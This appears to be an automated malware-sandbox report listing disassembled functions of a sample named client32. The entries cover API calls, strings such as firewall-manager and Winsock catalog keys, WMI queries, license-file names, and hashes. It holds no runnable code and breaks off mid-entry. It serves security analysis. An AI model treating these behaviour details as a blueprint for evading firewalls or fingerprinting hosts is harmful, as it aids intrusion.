                                                                                                                • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                                                • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                • API String ID: 4251163631-545709139
                                                                                                                • Opcode ID: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                                                • Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
                                                                                                                • Opcode Fuzzy Hash: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                                                • Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51
                                                                                                                APIs
                                                                                                                • wsprintfA.USER32 ref: 1101567A
                                                                                                                • _memset.LIBCMT ref: 110156BE
                                                                                                                • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 110156F8
                                                                                                                Strings
                                                                                                                • NSLSP, xrefs: 11015708
                                                                                                                • PackedCatalogItem, xrefs: 110156E2
                                                                                                                • %012d, xrefs: 11015674
                                                                                                                • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue_memsetwsprintf
                                                                                                                • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                                • API String ID: 1333399081-1346142259
                                                                                                                • Opcode ID: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                                                                • Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
                                                                                                                • Opcode Fuzzy Hash: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                                                                • Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90
                                                                                                                APIs
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 11010190
                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 11010214
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 11010222
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 11010235
                                                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                • String ID: bad cast
                                                                                                                • API String ID: 2427920155-3145022300
                                                                                                                • Opcode ID: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                                                • Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
                                                                                                                • Opcode Fuzzy Hash: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                                                • Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                                • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                                • API String ID: 3494822531-1878648853
                                                                                                                • Opcode ID: 24d87a64627cab5ad91252514022c9cb8009f58f212d92025f6c6eeea78916e9
                                                                                                                • Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
                                                                                                                • Opcode Fuzzy Hash: 24d87a64627cab5ad91252514022c9cb8009f58f212d92025f6c6eeea78916e9
                                                                                                                • Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91
                                                                                                                APIs
                                                                                                                • IsJPIK.PCICHEK(0BAD89F8,NSM.LIC,?,1102F092,View,Client,Bridge), ref: 1102A6F6
                                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _free_malloc_memsetwsprintf
                                                                                                                • String ID: IKS$NSM.LIC$Serial_no$_License$iks.lic
                                                                                                                • API String ID: 2814900446-469156069
                                                                                                                • Opcode ID: ff4ac407b235261cef4c9b00f394b765939f025b8093691e2c366861de4ad91e
                                                                                                                • Instruction ID: 268b58c6f7511c145cb41d8ae554306eba274149ba0ed4ca5467e6687dcac3b5
                                                                                                                • Opcode Fuzzy Hash: ff4ac407b235261cef4c9b00f394b765939f025b8093691e2c366861de4ad91e
                                                                                                                • Instruction Fuzzy Hash: 8931AF35E01729ABDB00CFA8CC81BEEFBF4AB49714F104299E826A72C0DB756940C791
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(00000324,000000FF), ref: 1101792C
                                                                                                                • CoInitialize.OLE32(00000000), ref: 11017935
                                                                                                                • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                                                • CoUninitialize.COMBASE ref: 110179C0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                                • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                                • API String ID: 2407233060-578995875
                                                                                                                • Opcode ID: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                                                                • Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
                                                                                                                • Opcode Fuzzy Hash: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                                                                • Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(00000324,000000FF), ref: 11017842
                                                                                                                • CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                                                • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                                                • CoUninitialize.COMBASE ref: 110178D0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                                • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                                                • API String ID: 2407233060-2037925671
                                                                                                                • Opcode ID: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                                                                • Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
                                                                                                                • Opcode Fuzzy Hash: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                                                                • Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • AutoICFConfig, xrefs: 11139650
                                                                                                                • DoICFConfig() OK, xrefs: 111396D6
                                                                                                                • Client, xrefs: 11139655
                                                                                                                • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 111396EC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CountTick
                                                                                                                • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                                                • API String ID: 536389180-1512301160
                                                                                                                • Opcode ID: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                                                                • Instruction ID: a12453e9faa0d912da9f55e5525ca7a81223e7cd1b6d2efb44fc6fc6c8488c0a
                                                                                                                • Opcode Fuzzy Hash: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                                                                • Instruction Fuzzy Hash: 2B21277CA262AF4AFB12CE75DED4791FA92278232EF010178D515862CCFBB49448CF46
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                                                • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                                                • CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                                • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                                • API String ID: 3222248624-258972079
                                                                                                                • Opcode ID: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                                                                • Instruction ID: 9199824aa3bd6ebf99e58618a68c234682766c17c5e3bd8f83aabb27c1d0aea9
                                                                                                                • Opcode Fuzzy Hash: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                                                                • Instruction Fuzzy Hash: BC11C235F4111DABC700EFA59C84EEFFF789F44705B500468E51ADB104EA25A980C7E1
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                                                • K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                                                                • SetLastError.KERNEL32(00000078,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026359
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                                                • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                                                • API String ID: 4186647306-532032230
                                                                                                                • Opcode ID: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                                                                • Instruction ID: 183e1746e0b9fc2934bd9ec846e99aaf72a90bbb460a81bb2001b4ad07131d97
                                                                                                                • Opcode Fuzzy Hash: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                                                                • Instruction Fuzzy Hash: BE012D72A41319ABE720DEA5EC44F4BB7E8EB88765F40452AF955D7600D630E8048BA0
                                                                                                                APIs
                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,7774C3F0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
                                                                                                                • CreateThread.KERNEL32(00000000,11110F55,00000001,00000000,00000000,0000000C), ref: 1111007A
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
                                                                                                                • CloseHandle.KERNEL32(?,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100B1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                                • API String ID: 3360349984-1136101629
                                                                                                                • Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                                                • Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
                                                                                                                • Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
